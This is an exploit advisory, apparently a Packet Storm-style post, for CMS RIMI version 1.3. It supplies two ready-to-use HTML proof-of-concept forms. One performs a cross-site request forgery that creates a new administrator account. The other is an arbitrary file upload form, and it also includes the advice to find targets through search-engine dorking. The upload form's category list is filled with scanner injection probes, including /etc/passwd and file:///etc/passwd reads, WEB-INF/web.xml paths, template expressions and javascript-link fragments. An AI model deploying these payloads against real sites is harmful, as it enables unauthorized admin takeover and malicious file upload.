Headline
CMS RIMI 1.3 Cross Site Request Forgery / File Upload
CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.
=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/myroot593/RIMICMS |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 9.
[+] Set the target site link Save changes and apply .
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Profile User Form</title>
</head>
<body>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">
<!-- Text input for username -->
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
<!-- Password input for password -->
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
<!-- Password input for confirm password -->
<label for="confirm_password">Confirm Password:</label>
<input type="password" id="confirm_password" name="confirm_password" required>
<!-- Text input for name -->
<label for="nama">Nama:</label>
<input type="text" id="nama" name="nama" required>
<!-- Text input for email -->
<label for="email">Email:</label>
<input type="email" id="email" name="email" required>
<!-- Hidden input for user ID -->
<input type="hidden" name="id" value="">
<!-- Submit button -->
<button type="submit">Submit</button>
</form>
</body>
</html>
------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------
[+] Go to the line 3.
[+] Set the target site link Save changes and apply .
[+] Your file : 127.0.0.1/cmsrimi/content
[+] save code as poc.html .
<p class="sukses-form"></p>
<p class="error-form"></p>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">
<div class="form-group “>
<label>Judul :</label>
<input type="text” name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">
<span><p class="error-form"></p></span>
</div>
<div class="form-group “>
<label>Isi Berita :</label>
<textarea class="ckeditor” name="isi_berita" id="isi_berita"></textarea>
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Kategori Berita :</label>
<select class=’form-control’ name=’kategori_berita’ id=’kategori_berita’ required=’’><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|||>!(()&&!|||</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=’"()>’"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1’">1’"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=’">’"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!–><!–</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>
</div>
<div class="form-group">
<label>Status:</label>
<select class="form-control" name="status_berita" id="status_berita">
<option value="Diterbitkan">Diterbitkan</option>
<option value="Draft">Draft</option>
</select>
</div>
<div class="form-group">
<label>Gambar Berita</label>
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">
<p class="error-form"></p>
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
<p class="error-form"></p>
<p class="error-form"></p>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================